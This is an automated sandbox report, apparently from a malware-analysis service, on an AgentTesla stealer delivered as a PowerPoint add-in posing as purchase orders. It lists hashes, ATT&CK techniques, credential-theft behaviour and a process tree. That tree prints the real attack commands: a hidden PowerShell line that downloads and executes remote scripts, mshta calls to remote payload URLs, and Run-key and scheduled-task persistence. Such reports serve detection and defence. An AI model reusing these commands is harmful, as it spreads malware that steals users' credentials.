agenttesla | da7b242a5fac33fd8bc5ad7650f4e0a946b0b07c01a239d778ec289c63b5be18

General

Target

Purchase orders with bank details.ppam
Size

8KB
MD5

ba36220554ab830aad2ce4f4a0a2acb4
SHA1

f54bb00c862d0f1f0e883e691a87da8285e1997b
SHA256

da7b242a5fac33fd8bc5ad7650f4e0a946b0b07c01a239d778ec289c63b5be18
SHA512

96809ecdef0947de44e08447ee4add90a62a5be111d0df8348d747e595b29879d12866bab3bd9011084946194d1b8a8a9a44920fc1689697767e38aef1339633

Score

10^/10

agenttesla collection keylogger persistence spyware stealer trojan

Malware Config

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

mshta.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	1920	2056	mshta.exe	POWERPNT.EXE

AgentTesla Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1408-320-0x000000000043752E-mapping.dmp	family_agenttesla
behavioral2/memory/3460-387-0x000000000043752E-mapping.dmp	family_agenttesla

Blocklisted process makes network request 14 IoCs

Processes:

mshta.exepowershell.exe

flow	pid	process
35	1920	mshta.exe
37	1920	mshta.exe
39	1920	mshta.exe
41	1920	mshta.exe
43	1920	mshta.exe
45	1920	mshta.exe
47	1920	mshta.exe
49	1920	mshta.exe
50	1920	mshta.exe
54	1920	mshta.exe
56	1920	mshta.exe
58	1920	mshta.exe
60	1920	mshta.exe
63	1792	powershell.exe

Drops file in Drivers directory 2 IoCs

Processes:

RegAsm.exejsc.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	RegAsm.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	jsc.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs

collection

Email Collection

T1114

Processes:

RegAsm.exejsc.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

mshta.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\Milalaasdasdlalal = "\"MsHta\"\"http://1230948%[email protected]/p/11.html\""	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\Cleanreasdasdddsults = "\"MsHta\"\"http://1230948%[email protected]/p/11.html\""	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\takeCare = "pOweRshell.exe -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_6d4a8cf357544827a7943b96f91f5785.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_15c2594b40a245a9936b81883534b8d8.txt').GetResponse().GetResponseStream()).ReadToend());"	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\SAFEsounkkkd = "\"MsHta\"\"http://1230948%[email protected]/p/11.html\""	mshta.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

powershell.exe

description	pid	process	target process
PID 1792 set thread context of 1408	1792	powershell.exe	jsc.exe
PID 1792 set thread context of 3460	1792	powershell.exe	RegAsm.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXEmshta.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	POWERPNT.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	mshta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	mshta.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

4060 schtasks.exe

pid	process
4060	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	POWERPNT.EXE

Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

1248 taskkill.exe
3928 taskkill.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

POWERPNT.EXE

pid process

2056 POWERPNT.EXE
Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

powershell.exedw20.exejsc.exeRegAsm.exe

pid process

1792 powershell.exe
1792 powershell.exe
3252 dw20.exe
3252 dw20.exe
1792 powershell.exe
1408 jsc.exe
1408 jsc.exe
3460 RegAsm.exe
3460 RegAsm.exe
Suspicious behavior: SetClipboardViewer 1 IoCs

Processes:

jsc.exe

pid process

1408 jsc.exe

pid	process
1248	taskkill.exe
3928	taskkill.exe

pid	process
2056	POWERPNT.EXE

pid	process
1792	powershell.exe
1792	powershell.exe
3252	dw20.exe
3252	dw20.exe
1792	powershell.exe
1408	jsc.exe
1408	jsc.exe
3460	RegAsm.exe
3460	RegAsm.exe

pid	process
1408	jsc.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

taskkill.exetaskkill.exepowershell.exejsc.exeRegAsm.exe

description	pid	process
Token: SeDebugPrivilege	1248	taskkill.exe
Token: SeDebugPrivilege	3928	taskkill.exe
Token: SeDebugPrivilege	1792	powershell.exe
Token: SeDebugPrivilege	1408	jsc.exe
Token: SeDebugPrivilege	3460	RegAsm.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

POWERPNT.EXE

pid process

2056 POWERPNT.EXE
Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

POWERPNT.EXEmshta.exejsc.exeRegAsm.exe

pid process

2056 POWERPNT.EXE
2056 POWERPNT.EXE
2056 POWERPNT.EXE
1920 mshta.exe
1408 jsc.exe
3460 RegAsm.exe

pid	process
2056	POWERPNT.EXE

pid	process
2056	POWERPNT.EXE
2056	POWERPNT.EXE
2056	POWERPNT.EXE
1920	mshta.exe
1408	jsc.exe
3460	RegAsm.exe

Suspicious use of WriteProcessMemory 32 IoCs

Processes:

POWERPNT.EXEmshta.exepowershell.execsc.exe

description	pid	process	target process
PID 2056 wrote to memory of 1920	2056	POWERPNT.EXE	mshta.exe
PID 2056 wrote to memory of 1920	2056	POWERPNT.EXE	mshta.exe
PID 1920 wrote to memory of 1248	1920	mshta.exe	taskkill.exe
PID 1920 wrote to memory of 1248	1920	mshta.exe	taskkill.exe
PID 1920 wrote to memory of 3928	1920	mshta.exe	taskkill.exe
PID 1920 wrote to memory of 3928	1920	mshta.exe	taskkill.exe
PID 1920 wrote to memory of 4060	1920	mshta.exe	schtasks.exe
PID 1920 wrote to memory of 4060	1920	mshta.exe	schtasks.exe
PID 1920 wrote to memory of 1792	1920	mshta.exe	powershell.exe
PID 1920 wrote to memory of 1792	1920	mshta.exe	powershell.exe
PID 1920 wrote to memory of 3252	1920	mshta.exe	dw20.exe
PID 1920 wrote to memory of 3252	1920	mshta.exe	dw20.exe
PID 1792 wrote to memory of 1408	1792	powershell.exe	jsc.exe
PID 1792 wrote to memory of 1408	1792	powershell.exe	jsc.exe
PID 1792 wrote to memory of 1408	1792	powershell.exe	jsc.exe
PID 1792 wrote to memory of 1408	1792	powershell.exe	jsc.exe
PID 1792 wrote to memory of 1408	1792	powershell.exe	jsc.exe
PID 1792 wrote to memory of 1408	1792	powershell.exe	jsc.exe
PID 1792 wrote to memory of 1408	1792	powershell.exe	jsc.exe
PID 1792 wrote to memory of 1408	1792	powershell.exe	jsc.exe
PID 1792 wrote to memory of 1112	1792	powershell.exe	csc.exe
PID 1792 wrote to memory of 1112	1792	powershell.exe	csc.exe
PID 1112 wrote to memory of 3808	1112	csc.exe	cvtres.exe
PID 1112 wrote to memory of 3808	1112	csc.exe	cvtres.exe
PID 1792 wrote to memory of 3460	1792	powershell.exe	RegAsm.exe
PID 1792 wrote to memory of 3460	1792	powershell.exe	RegAsm.exe
PID 1792 wrote to memory of 3460	1792	powershell.exe	RegAsm.exe
PID 1792 wrote to memory of 3460	1792	powershell.exe	RegAsm.exe
PID 1792 wrote to memory of 3460	1792	powershell.exe	RegAsm.exe
PID 1792 wrote to memory of 3460	1792	powershell.exe	RegAsm.exe
PID 1792 wrote to memory of 3460	1792	powershell.exe	RegAsm.exe
PID 1792 wrote to memory of 3460	1792	powershell.exe	RegAsm.exe

outlook_office_path 1 IoCs

Processes:

jsc.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe

outlook_win_path 1 IoCs

Processes:

jsc.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe

C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\Purchase orders with bank details.ppam" /ou ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2056

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" https://www.bitly.com/ajdwwaskdorufhjwijjd
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1920

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im winword.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1248

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im Excel.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3928

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""Bluefibonashi"" /F /tr ""\""MsHtA""\""http://1230948%[email protected]/p/11.html\""
3⤵
- Creates scheduled task(s)
PID:4060

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_6d4a8cf357544827a7943b96f91f5785.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_15c2594b40a245a9936b81883534b8d8.txt').GetResponse().GetResponseStream()).ReadToend());
3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1792

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
4⤵
- Drops file in Drivers directory
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: SetClipboardViewer
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
PID:1408

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2xkwzkgs\2xkwzkgs.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:1112

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3BEC.tmp" "c:\Users\Admin\AppData\Local\Temp\2xkwzkgs\CSC325A1561AAC9416894A33C28CF8CD8C4.TMP"
5⤵
PID:3808

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
- Drops file in Drivers directory
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3460

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
dw20.exe -x -s 2528
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3252

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Registry Run Keys / Startup Folder

Scheduled Task

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

1

T1112

Credential Access

Credentials in Files

3

T1081

Discovery

Query Registry

2

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Data from Local System

Email Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\2xkwzkgs\2xkwzkgs.dll

MD5
fd1975d5acd5b2f13faeda77dd3cd3c5

SHA1
a6720ac714e4cbf66e6809e7d9cc3846d50a2df5

SHA256
8ce061f4fae32487c7bd63cbaf5c14dd923a0f5b132848b3c640b23bb614b304

SHA512
b3ab479939ada8a72cc74ba7877e4d89f9c62a33b99b06c7e90f03272043efd8bfa99f6812de060d858c54252ef5bf1b544cd76148c1ca004facbf08fc97d59f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES3BEC.tmp

MD5
19938b1bb397b29005e1ed8643c050cd

SHA1
2fc8f62b4136c12e43b6c395d314ca1fa04e9864

SHA256
02f6c91b7591015c74c9b8cbb3c1a0e396c36d57a50f3e50ef369bfd67efb186

SHA512
bd10bf0e70fa6d40c3e227c750a2bc3b94dcc4354b0c42909b6e59859d3f952271f78d26f868d442964144ea9729130e782a81fda2316e6f0575c3775a74c51f

Download Submit
C:\Windows\system32\drivers\etc\hosts

MD5
5b2d17233558878a82ee464d04f58b59

SHA1
47ebffcad0b4c358df0d6a06ef335cb6aab0ab20

SHA256
5b036588bb4cad3de01dd04988af705da135d9f394755080cf9941444c09a542

SHA512
d2aec9779eb8803514213a8e396b2f7c0b4a6f57de1ee84e9db0343ee5ff093e26bb70e0737a6681e21e88898ef5139969ff0b4b700cb6727979bd898fdbc85b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2xkwzkgs\2xkwzkgs.0.cs

MD5
e03b1e7ba7f1a53a7e10c0fd9049f437

SHA1
3bb851a42717eeb588eb7deadfcd04c571c15f41

SHA256
3ca2d456cf2f8d781f2134e1481bd787a9cb6f4bcaa2131ebbe0d47a0eb36427

SHA512
a098a8e2a60a75357ee202ed4bbe6b86fa7b2ebae30574791e0d13dcf3ee95b841a14b51553c23b95af32a29cc2265afc285b3b0442f0454ea730de4d647383f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2xkwzkgs\2xkwzkgs.cmdline

MD5
836bdb6cb89a4bf02e80cf39b68b160c

SHA1
fe811df2413ceaa798f2da4485a806869eac493a

SHA256
9820860f94a237dfe77826f053b702bb37990047b2445ea03bd577ff131ad01e

SHA512
d44af167215a6eb9c3180708e54ea529e427c255b6e363c6912f7a0ebf80b88102cb832ca73ccef37190f00979c1c7415fd47e829e66c431dae5a7ba33acf66d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2xkwzkgs\CSC325A1561AAC9416894A33C28CF8CD8C4.TMP

MD5
eac4640bfe82a22f05a2479786ea6a4c

SHA1
c91a21cc77b068737a58544b4594df9f652fd978

SHA256
58179f5cbaf65d0104b6727ae3b3152d158ce43c1b9c955b5130c90c00c16861

SHA512
0a868a764bfec2681c7cf09b3cf5ad71ed110cdaa61659b53dba0c472af351c003960904a75c95355a68718671bb1bd571f910184ae50a9c40b581fb5cba0fdc

Download Submit
memory/1112-378-0x0000000000000000-mapping.dmp

Download
memory/1248-294-0x0000000000000000-mapping.dmp

Download
memory/1408-320-0x000000000043752E-mapping.dmp

Download
memory/1408-403-0x00000000013F1000-0x00000000013F2000-memory.dmp

Filesize
4KB

Download
memory/1408-377-0x00000000013F0000-0x00000000013F1000-memory.dmp

Filesize
4KB

Download
memory/1792-312-0x0000026469763000-0x0000026469765000-memory.dmp

Filesize
8KB

Download
memory/1792-313-0x0000026469766000-0x0000026469768000-memory.dmp

Filesize
8KB

Download
memory/1792-297-0x0000000000000000-mapping.dmp

Download
memory/1792-311-0x0000026469760000-0x0000026469762000-memory.dmp

Filesize
8KB

Download
memory/1920-261-0x0000000000000000-mapping.dmp

Download
memory/2056-120-0x00000202604A0000-0x00000202604A2000-memory.dmp

Filesize
8KB

Download
memory/2056-118-0x00007FFA0A8B0000-0x00007FFA0A8C0000-memory.dmp

Filesize
64KB

Download
memory/2056-116-0x00007FFA0A8B0000-0x00007FFA0A8C0000-memory.dmp

Filesize
64KB

Download
memory/2056-117-0x00007FFA0A8B0000-0x00007FFA0A8C0000-memory.dmp

Filesize
64KB

Download
memory/2056-251-0x000002026DF40000-0x000002026DF44000-memory.dmp

Filesize
16KB

Download
memory/2056-122-0x00000202604A0000-0x00000202604A2000-memory.dmp

Filesize
8KB

Download
memory/2056-115-0x00007FFA0A8B0000-0x00007FFA0A8C0000-memory.dmp

Filesize
64KB

Download
memory/2056-119-0x00007FFA0A8B0000-0x00007FFA0A8C0000-memory.dmp

Filesize
64KB

Download
memory/2056-121-0x00000202604A0000-0x00000202604A2000-memory.dmp

Filesize
8KB

Download
memory/3252-303-0x0000000000000000-mapping.dmp

Download
memory/3460-387-0x000000000043752E-mapping.dmp

Download
memory/3460-393-0x0000000005590000-0x0000000005591000-memory.dmp

Filesize
4KB

Download
memory/3460-404-0x0000000005591000-0x0000000005592000-memory.dmp

Filesize
4KB

Download
memory/3808-381-0x0000000000000000-mapping.dmp

Download
memory/3928-295-0x0000000000000000-mapping.dmp

Download
memory/4060-296-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads